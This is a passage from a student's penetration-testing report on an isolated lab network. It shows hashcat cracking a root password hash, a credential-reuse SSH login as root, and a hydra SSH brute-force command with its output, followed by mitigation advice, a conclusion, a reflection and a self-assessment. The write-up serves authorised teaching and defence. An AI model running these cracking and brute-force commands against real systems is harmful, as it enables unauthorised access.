Kernel <amp> was not vectorized
Done.
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

$6$Ywz7iATH$6o7zj4mmNsZvAu5tdqLCBNRw6w93sXWLNlwxI2d...I7Kh/:puppet

Session.....: hashcat
Status.....: Cracked
Hash.Type.....: sha512crypt $6$, SHA512 (Unix)
Hash.Target....: $6$Ywz7iATH$6o7zj4mmNsZvAu5tdqLCBNRw6w93sXWLNlwxI2...I7Kh/
Time.Started...: Mon Dec 1 12:17:17 2025 (7 secs)
Time.Estimated...: Mon Dec 1 12:17:24 2025 (0 secs)
Guess.Base.....: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue.....: 1/1 (100.00%)
Speed.#1.....: 1285 H/s (9.97ms) @ Accel:256 Loops:64 Thr:1 Vec:2
Recovered.....: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.....: 9216/14344385 (0.06%)
Rejected.....: 0/9216 (0.00%)
Restore.Point...: 8192/14344385 (0.06%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: total90 -> sassy123

Started: Mon Dec 1 12:17:06 2025
Stopped: Mon Dec 1 12:17:26 2025
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~#

```

Figure 47: Cracking of server 2's root user's password hash using hashcat - part 2

With the password acquired for Server 2, it can be tried on Server 7 to see if they share the same password. In this scenario, it is found to have been the case, as is shown below with successful a successful SSH connection using the root account. This vulnerability was exploitable because Server 7 did not enforce unique credentials and there was no account lockout (i.e due to connection from an unknown host). These weaknesses are what allowed for this credential reuse attack to be successful.

```

root@kali:~# ssh root@192.168.9.128
The authenticity of host '192.168.9.128 (192.168.9.128)' can't be established.
ECDSA key fingerprint is SHA256:UA7V/8A088C06VdqVyoXlE2+Qy62bidkZQXYHkMr7rs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.128' (ECDSA) to the list of known hosts.
root@192.168.9.128's password: puppet
Linux localhost 3.2.0-4-686-pae #1 SMP Debian 3.2.65-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 21 15:50:37 2019
root@localhost:~# whoami
root
root@localhost:~# id
uid=0(root) gid=0(root) groups=0(root)
root@localhost:~# id -u
0
root@localhost:~# echo SID: 2304874
SID: 2304874
root@localhost:~#

```

Figure 48: Successful SSH connection of server 7 using root user credentials acquired from server 2

In addition, due to the absence of any measures against brute forcing, a wordlist can be exhausted at will. Seen below, this results in successful acquisition of the same 'puppet' password in just a few hours.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.9.128 ssh -t 4 -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-30 05:01:27
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1:p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.9.128:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 32.33 tries/min, 97 tries in 00:03h, 14344302 to do in 7393:59h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 29.47 tries/min, 442 tries in 00:15h, 14343957 to do in 8113:06h, 4 active
[STATUS] 28.71 tries/min, 890 tries in 00:31h, 14343509 to do in 8326:46h, 4 active
[STATUS] 28.60 tries/min, 1344 tries in 00:47h, 14343055 to do in 8359:41h, 4 active
[STATUS] 28.63 tries/min, 1804 tries in 01:03h, 14342595 to do in 8347:58h, 4 active
[STATUS] 28.66 tries/min, 2264 tries in 01:19h, 14342135 to do in 8340:55h, 4 active
[STATUS] 28.63 tries/min, 2720 tries in 01:35h, 14341679 to do in 8348:25h, 4 active
[STATUS] 28.53 tries/min, 3167 tries in 01:51h, 14341232 to do in 8377:26h, 4 active
[STATUS] 28.54 tries/min, 3624 tries in 02:07h, 14340775 to do in 8376:01h, 4 active
[STATUS] 28.56 tries/min, 4084 tries in 02:23h, 14340315 to do in 8368:42h, 4 active
[STATUS] 28.58 tries/min, 4544 tries in 02:39h, 14339855 to do in 8362:49h, 4 active
[STATUS] 28.51 tries/min, 4990 tries in 02:55h, 14339409 to do in 8381:26h, 4 active
[STATUS] 28.52 tries/min, 5448 tries in 03:11h, 14338951 to do in 8378:26h, 4 active
[STATUS] 28.52 tries/min, 5904 tries in 03:27h, 14338495 to do in 8378:42h, 4 active
[STATUS] 28.54 tries/min, 6364 tries in 03:43h, 14338035 to do in 8373:38h, 4 active
[STATUS] 28.51 tries/min, 6814 tries in 03:59h, 14337585 to do in 8381:29h, 4 active
[STATUS] 28.52 tries/min, 7273 tries in 04:15h, 14337126 to do in 8377:57h, 4 active
[STATUS] 28.50 tries/min, 7724 tries in 04:31h, 14336675 to do in 8383:29h, 4 active
[STATUS] 28.51 tries/min, 8183 tries in 04:47h, 14336216 to do in 8380:10h, 4 active
[22][ssh] host: 192.168.9.128 login: root password: puppet
[STATUS] attack finished for 192.168.9.128 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-30 09:49:21
root@kali:~#
```

Figure 49: Successful Hydra brute force of server 7

Unlike Server 2's web-based RCE exploit resulting in compromise, root access was achieved on Server 7 through a distinct weakness, this being credential reuse coupled with weak authentication controls. In a financial environment, attackers gaining access through a credential reuse vulnerability would allow for rapid lateral movement between multiple, potentially critical, servers. This would put sensitive financial data at risk of compromise. Despite there being no backdoor established on Server 7, with full privileged access an attacker could trivially establish this, such as by modifying scheduled scripts or adding their own SSH keys.

7.4 Research into possible exploit mitigation & recommendations

As there is some overlap with Server 2's vulnerabilities, the below recommendations follow a similar pattern.

Outdated / EOL Samba Version

RCE vulnerabilities that apply to Samba 3.6.6 can be mitigated by upgrading to a currently supported version. Subsequently, recurrence can be prevented by ensuring timely patching in accordance with a recognised software management strategy. Samba-specific mitigation measures include restricting its functionality to only the required shares and features, in keeping with NIST CM-7 (Least Functionality) (National Institute of Standards and Technology, 2020). Though less effective than a full version upgrade, essential security patches can be backported to the existing version to temporarily reduce risk.

SMBv1 Enabled + SMB Signing Disabled

An immediate and recommended solution to combat vulnerabilities associated with SMBv1 is to disable the protocol entirely, due to it being deemed cryptographically broken (Microsoft Corporation, 2023). The result of which is protection against malware families which target

SMBv1, such as WannaCry. In addition, the Samba configuration should be audited periodically, ensuring that any re-enablement of deprecated protocols is proactively addressed. Whilst disabling SMBv1 is most preferable, other controls such as network segmentation can provide some protection until full deprecation is possible.

Anonymous Read/Write Samba Share

The mitigation strategy to avoid anonymous access to the Samba service being used maliciously is to disable it, instead enforcing authentication for all shares. If keeping it enabled is essential, applying a least-privilege permission strategy like NIST AC-6 (Least Privilege) is advisable to limit capabilities to only what is necessary (National Institute of Standards and Technology, 2020).

Samba Symlink Traversal

By making changes to the Samba configuration file, disabling both **wide links** and **follow symlinks**, filesystem traversal attacks can be prevented. A byproduct of earlier recommendations to update the Samba version will also patch against symlink traversal vulnerabilities (e.g CVE-2017-7494). Additionally, a logging strategy can be implemented to monitor for unexpected file access patterns, identifying possible unauthorised traversal attempts.

RPC regsvc DoS Vulnerability

In order to protect against the DoS vulnerability affecting the RPC service, a host based firewall can be implemented to only permit connections from trusted internal systems. Monitoring for abnormal RPC traffic can also serve as an early indicator for a DoS attempt, which could then be blocked on a per-IP basis.

Outdated OpenSSH Version

As already addressed for Server 2, the outdated OpenSSH version can be patched and maintained to mitigate known CVEs. Other hardening techniques, such as enforcing key-based session authentication, can also be applied here. Like other outdated software that has been identified, some interim protection could be achieved by backporting security patches, if immediate upgrading is not possible due to operational reasons.

Weak SSH Cryptographic Algorithms Supported

To mitigate threats enabled by the use of weak SSH cryptographic algorithms, disabling them should be a priority. By aligning SSH configuration with industry guidance, such as the CIS SSH Benchmark (Center for Internet Security, 2024), more modern and secure cryptographic suites can be adopted. As a financial institution, Ruskin Investment Bank are likely bound by regulatory expectations that enforce strict cryptographic configuration, making secure SSH settings essential.

SSH Host Key Enumeration

The exposure of SSH host keys through the **ssh-keyscan** can be prevented by restricting the SSH banner from disclosing this information. Additionally, by monitoring against repeated host key scanning, attempts at pre-attack reconnaissance can be logged for further investigation.

Credential Reuse

The critical vulnerability, that ultimately resulted in full system compromise, was the reuse of credentials across systems, notably the root user password being shared between server 2 and 7.

This can be defined as an operational security failure, as opposed to a technical misconfiguration like some of the prior vulnerabilities. To prevent recurrence of this vulnerability being exploited, credentials should be kept unique across systems and managed in line with NIST SP 800-63-4 guidance, which discourages password reuse and provides strategies for account life cycle management (National Institute of Standards and Technology, 2024). A privileged access management (PAM) solution could be used to enforce unique and regularly rotated passwords.

8 Conclusion

In this investigation numerous critical vulnerabilities were discovered on both servers. Many of which stemmed from severely outdated and end-of-life software packages and operating systems still being used. On Server 2, chaining a GitList RCE vulnerability with the kernel-level Dirty COW privilege escalation exploit provided full compromise of the system and root level access. On Server 7, many misconfigurations with the Samba service were discovered, with filesystem traversal techniques providing unintended access to sensitive files stored outside of the public share. Eventual root compromise of Server 7 was achieved through credential reuse, after the password from Server 2 was decrypted and found to match the root account on Server 7. This highlighted poor credential hygiene and a lack of adequate network segmentation. Analysis of the vulnerabilities found on both servers found consistent violation of confidentiality, integrity and availability branches, with both servers having viable paths to full system compromise.

As was stated in the introduction, only 2 of the 8 servers present in the topology were assigned, resulting in potential weaknesses present in the rest of the network not being investigated. In addition, due to the black-box methodology that was employed, conclusions that would only be possible with full internal visibility may not have been discovered.

The key takeaways from this report, that should be acted on by Ruskin Investment Bank immediately, mainly comprise a need for a comprehensive and ongoing software management strategy. This would remedy evidenced systemic use of outdated software throughout their infrastructure. Additionally, a centralised monitoring strategy that seeks to provide early detection of certain behaviours (e.g reconnaissance, brute force attacks etc.) would allow for ongoing protection efforts to occur. Adopting industry best practices and policies, which do not currently appear to be in place, would provide a robust framework for Ruskin Investment Bank to operate from.

9 Reflection

Whilst I entered this project with a good understanding of cybersecurity concepts, I had almost no ethical hacking tool experience. As a result, I was able to develop new skills with tools like **nmap**, **hashcat** and Metasploit modules. Being able to enumerate a black box scenario is not something I had done before, and I was able to build on this with my prior networking and digital security knowledge. I feel that I was able to strengthen the Linux skills I already possessed, particularly through Kali, which I had never used before. My prior experience with protocols like SSH and HTTP was built on during this assignment, and I gained a new understanding of new protocols like Samba and RPC. The final technical aspect I learned was being able to chain exploits together to achieve root access, with both servers relying on using an initial foothold and then escalating privilege or moving laterally. I felt that most of the practical classes demonstrated success using single-step exploits, so the added complexity in the assignment demanded more advanced thinking.

Analytically, I was able to build a new understanding of how to methodically progress from reconnaissance, to enumeration, and finally exploitation, resulting in a logical attack path being built from scratch. Whilst I already had good analytical skill in interpreting things like scan results, being able to efficiently sift through 'noisy' outputs is a skill I've been able to improve. I was also able to apply my conceptual understanding of CVSS, into now being comfortable in applying this framework practically, something I am certain has relevancy in industry roles. I have a lot of prior experience working in corporate environments, so found it natural to contextualise my findings in terms of business impact and context. Another area of analytical skill I was able to hone was my ability to determine whether a finding was a false positive or red herring, as many of these were encountered during this assignment.

I encountered a number of challenges during this assignment. As mentioned above, needing to chain multiple exploits together in order to reach root-level access on server 2, was something I initially found unintuitive. As a result, I had to learn to piece my findings together, instead of expecting a single-path exploit. Server 7 was by far the more difficult to me of the two servers. I spent a lot of time reaching dead-ends with Samba exploits and difficulty in enumerating anything of real use. Eventually, by applying creative thinking, reusing cracked credentials from server 2, I was able to reach a solution. I felt that many of the exploits I found, should have worked in theory, but didn't due to possible environment nuances or quirks with NETLAB. This frequently forced me into time-consuming troubleshooting loops. At times, I struggled to stay up to date with documenting my findings, as I was more drawn to the practical side of attempting new exploits. This resulted in my write up being completed in quite a fragmented way. Overall, I think that I expected more straightforward exploit paths, as had been the case in the weekly practical classes, but these more realistic targets required a deeper level of thinking that was less guided. Whilst I found it quite natural to investigate the web related areas of the topology due to my website development background, having to analyse Linux and OS related aspects required a slower, more careful approach.

Critically examining my methodology, I found that my initial scanning and enumeration was very thorough, and gave me a strong foundation to operate from for both servers. Despite the black box nature of the assignment, the port, service and OS discovery steps I underwent allowed me to quickly build an accurate picture of each server. From the early stages, I found it quite logical to interpret these results and decide what was relevant. With that said, next time I would definitely look to cast a wider net early on, instead of going deep down a single,

sometimes inconclusive, rabbit hole (i.e Samba on S7). Additionally, despite it not serving as my eventual winning formula, I would run time-consuming tasks (like brute forces) in the background from day 1, rather than waiting til later in the trimester like I did. When I would hit a dead end, I would sometimes have to return to the scanning and enumeration stage, so I would aim to fully enumerate once at the beginning instead of having to take a backwards step. Tool wise, next time I would experiment with a wider range of tools, such as **enum4linux** for enumerating the early stages of the test. That way I could avoid over reliance on single tools, and potentially uncover new insights.

Despite this assignment being on an isolated lab environment, I was still able to develop an awareness of staying within scope, exercising discipline in only targeting my 2 assigned servers. In my research into more aggressive techniques, such as brute forcing and DoS attacks, I learned the importance of exercising caution in real environments, due to potential impacts on business continuity. When I was handling cracked passwords and hashes, I was able to reflect on the considerations I may need to apply when accessing sensitive information, even with them being synthetic in this scenario. I also became more aware of the responsibility I would have upon discovery of vulnerabilities, as delaying or miscommunicating reports could have serious implications in a real world scenario. From the beginning, it has been instilled in me the difference between applying the skills I have developed ethically, rather than for malicious intentions.

Looking into the future, this project provided me with an authorised practical environment to learn offensive security techniques, something that is otherwise difficult to experience first hand without legal and ethical concerns. Prior to this assignment, I had only some theoretical understanding, which I have now paired with real case study experience that I can reference during interviews for related roles. I am interested in pursuing compliance and governance related cyber roles when I graduate, so have found great value within aspects like CVSS scoring, CVEs and being able to articulate potential business impact. Plus, understanding the how certain governance frameworks can be mapped to technical weaknesses is something that will support me pursuing roles in assurance or risk. Whether or not I eventually work in offensive or defensive security, having an understanding of the former will strengthen my abilities in the latter. Lastly, being able to produce a full technical report like the above, aimed at both technical and non-technical readers, is a highly transferable skill that I will likely make use of in any computing-related role.

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11 Self-Assessment

Section	Subsection	Max Score	Your Score	Justification
Methodology and Justification for Tool Selection		5	4	All phases covered with detailed tool explanations, thoroughly referenced. Potentially too much depth.
First Server	Depth of understanding gleaned from footprinting and vulnerabilities detected	5	4	Comprehensive findings from footprinting and enumeration stages, with vulnerabilities clearly summarised into tables.
	Relevance of security issues found	5	4	Logical and justified CVSS scoring and business relevance. Some repetition throughout rationales.
	The exploitation of vulnerabilities found & backdoors potentially used	15	13	Multiple vulnerabilities chained to achieve full root access. Exploit conditions could be more thoroughly explained.
	Research into possible exploit mitigation & recommendations	5	4	Accurate, well referenced recommendations, mapped to recognised frameworks where possible. Some overlap.
Second Server	Depth of understanding gleaned from footprinting and vulnerabilities detected	5	4	Strong enumeration of services different to Server 2. Some areas could probably be more concise.
	Relevance of security issues found	5	4	Accurate and well supported CVSS scores, some difficulty restating explanations that have overlap with Server 2.
	The exploitation of vulnerabilities found & backdoors potentially used	15	10	Justified credential reuse attack, but less complex than Server 2's exploit path. No backdoor is established, although is noted as possible.
	Research into possible exploit mitigation & recommendations	5	4	Practical mitigations provided with mapping to various sources. Some reuse of advice from Server 2, where alternatives could have been provided.
Reflection		30	26	Detailed, honest reflection that covers all areas. Could potentially be made tighter or more concise.
Report Structure and Quality		5	4	Well structured, professional report that is suitable for its audience. Some screenshot heavy sections reduce the flow.
TOTAL		100	81	